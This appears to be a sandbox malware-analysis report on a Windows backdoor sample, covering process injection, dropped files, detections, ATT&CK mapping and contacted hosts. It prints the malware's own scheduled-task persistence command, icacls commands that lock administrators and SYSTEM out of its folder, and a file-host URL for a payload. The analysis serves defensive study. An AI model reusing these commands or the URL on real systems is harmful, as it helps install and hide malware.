Code function: 13_2_00402C80 __EH_prolog,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

13_2_00402C80

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Show sources

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

File created: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Jump to dropped file

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 427000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 43A000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 43B000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Memory written: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe base: 60D008	Jump to behavior

Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs'	Jump to behavior
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Process created: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe 'C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Process created: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'S-1-1-0:(R,REA,RA,RD)' 'S-1-5-7:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)'

Source: AIKY.exe, 00000021.00000000.418158180.0000000001100000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: AIKY.exe, 00000021.00000000.418158180.0000000001100000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: AIKY.exe, 00000021.00000000.418158180.0000000001100000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: AIKY.exe, 00000021.00000000.418158180.0000000001100000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Code function: 13_2_0040B26B cpuid

13_2_0040B26B

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_00421008
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: GetLocaleInfoW,	13_2_0041A0B2
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: GetLocaleInfoW,	13_2_00421258
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_00421381
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_00420C1D
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: GetLocaleInfoW,	13_2_00421488
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_00421555
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: EnumSystemLocalesW,	13_2_00419D0D
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: EnumSystemLocalesW,	13_2_00420EE0
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: EnumSystemLocalesW,	13_2_00420E95
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: EnumSystemLocalesW,	13_2_00420F7B
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetLocaleInfoW,	14_2_00E9D1D6
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_00E9D2FE
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetLocaleInfoW,	14_2_00E9DBF9
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_00E9CB6A
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_00E9D4D9
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetLocaleInfoW,	14_2_00E9D406
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: EnumSystemLocalesW,	14_2_00E9CEF6
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: EnumSystemLocalesW,	14_2_00E9D6DD
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: EnumSystemLocalesW,	14_2_00E9CE5B
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: EnumSystemLocalesW,	14_2_00E9CE10
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_00E9CF81
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	25_2_00B5D1D6
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	25_2_00B5D2FE
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	25_2_00B5DBF9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	25_2_00B5CB6A
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	25_2_00B5D4D9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	25_2_00B5D406
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	25_2_00B5CEF6
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	25_2_00B5D6DD
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	25_2_00B5CE10
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	25_2_00B5CE5B
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	25_2_00B5CF81
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	33_2_00B5D1D6
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	33_2_00B5D2FE
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	33_2_00B5DBF9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	33_2_00B5CB6A
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	33_2_00B5D4D9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	33_2_00B5D406
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	33_2_00B5CEF6
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	33_2_00B5D6DD
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	33_2_00B5CE10
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	33_2_00B5CE5B
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	33_2_00B5CF81
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	36_2_00B5D1D6
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	36_2_00B5D2FE
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	36_2_00B5DBF9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	36_2_00B5CB6A
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	36_2_00B5D4D9
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,	36_2_00B5D406
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	36_2_00B5CEF6
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	36_2_00B5D6DD
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	36_2_00B5CE10
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: EnumSystemLocalesW,	36_2_00B5CE5B
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	36_2_00B5CF81

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Queries volume information: C:\Users\user\Desktop\wa71myDkbQ.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

Code function: 13_2_0041A11C GetSystemTimeAsFileTime,

13_2_0041A11C

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Code function: 14_2_00E88E00 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,

14_2_00E88E00

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Code function: 14_2_00E84383 IsWindowVisible,GetWindowLongA,SetWindowLongA,GetVersionExA,GetTopWindow,

14_2_00E84383

Source: C:\Users\user\Desktop\wa71myDkbQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Application Shimming1	Application Shimming1	Disable or Modify Tools11	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Create Account1	Process Injection412	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Scheduled Task/Job1	Scripting11	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder11	Registry Run Keys / Startup Folder11	Obfuscated Files or Information3	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Services File Permissions Weakness1	Services File Permissions Weakness1	Software Packing12	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Security Software Discovery141	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion141	DCSync	Virtualization/Sandbox Evasion141	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection412	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	NTFS File Attributes1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Services File Permissions Weakness1	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wa71myDkbQ.exe	71%	Virustotal		Browse
wa71myDkbQ.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
wa71myDkbQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	100%	Avira	HEUR/AGEN.1136766
C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	100%	Avira	HEUR/AGEN.1136766
C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	100%	Joe Sandbox ML
C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	100%	Joe Sandbox ML
C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	90%	ReversingLabs	Win32.Trojan.Zenpak
C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	90%	ReversingLabs	Win32.Trojan.Zenpak
C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

Source	Detection	Scanner	Label	Download
13.0.wa71myDkbQ.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1141687	Download File
25.0.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
44.2.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
50.0.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
33.0.AIKY.exe.b30000.2.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
13.0.wa71myDkbQ.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1141687	Download File
36.2.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
14.0.Izhwsiraoosvchost.exe.e70000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
40.0.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
13.0.wa71myDkbQ.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1141687	Download File
40.2.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
25.2.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
33.0.AIKY.exe.b30000.1.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
33.2.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
36.0.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
13.0.wa71myDkbQ.exe.400000.11.unpack	100%	Avira	HEUR/AGEN.1141687	Download File
44.0.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
13.2.wa71myDkbQ.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141687	Download File
50.2.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
33.0.AIKY.exe.b30000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File
14.2.Izhwsiraoosvchost.exe.e70000.0.unpack	100%	Avira	HEUR/AGEN.1136766	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://anonfiles.com/pl	0%	Avira URL Cloud	safe
https://anonfiles.com/register	0%	Avira URL Cloud	safe
https://anonfiles.com/terms	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://cdn-101.anonfiles.com/P1hemdxeu9/4573c555-1623353401/cmd.exe	0%	Avira URL Cloud	safe
https://anonfiles.com/es	0%	Avira URL Cloud	safe
https://anonfiles.com/in	0%	Avira URL Cloud	safe
https://anonfiles.com/kr	0%	Avira URL Cloud	safe
https://anonfiles.com/us	0%	Avira URL Cloud	safe
https://anonfiles.com/feedback	0%	Avira URL Cloud	safe
https://anonfiles.com/faq	0%	Avira URL Cloud	safe
https://anonfiles.com/docs/api	0%	Avira URL Cloud	safe
https://anonfiles.com/br	0%	Avira URL Cloud	safe
https://anonfiles.com/se	0%	Avira URL Cloud	safe
https://anonfiles.com/fr	0%	Avira URL Cloud	safe
https://anonfiles.com/abuse	0%	Avira URL Cloud	safe
https://anonfiles.com/dk	0%	Avira URL Cloud	safe
https://anonfiles.com/jp	0%	Avira URL Cloud	safe
https://anonfiles.com/de	0%	Avira URL Cloud	safe
https://anonfiles.com/no	0%	Avira URL Cloud	safe
https://anonfiles.com/fi	0%	Avira URL Cloud	safe
https://anonfiles.com/ru	0%	Avira URL Cloud	safe
https://anonfiles.com/login	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cdn-101.anonfiles.com	217.64.149.169	true	false	unknown
anonfiles.com	104.21.10.26	true	false	unknown
botboyz.online	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://anonfiles.com/pl	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/register	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/terms	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	WerFault.exe, 0000002F.00000003.452879282.0000000005121000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js	QshTYpu5dWRfMPie.exe.13.dr	false		high
https://cdn-101.anonfiles.com/P1hemdxeu9/4573c555-1623353401/cmd.exe	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/es	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://oss.maxcdn.com/respond/1.4.2/respond.min.js	QshTYpu5dWRfMPie.exe.13.dr	false		high
https://anonfiles.com/in	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/kr	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/us	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/feedback	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/faq	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/docs/api	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/br	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/se	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/fr	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/abuse	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	wa71myDkbQ.exe, 00000000.00000002.352158045.00000000028A1000.00000004.00000001.sdmp	false		high
https://anonfiles.com/dk	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/jp	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/de	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/no	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/fi	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/ru	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/login	QshTYpu5dWRfMPie.exe.13.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.10.26	anonfiles.com	United States		13335	CLOUDFLARENETUS	false
217.64.149.169	cdn-101.anonfiles.com	Sweden		197595	OBE-EUROPEObenetworkEuropeSE	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
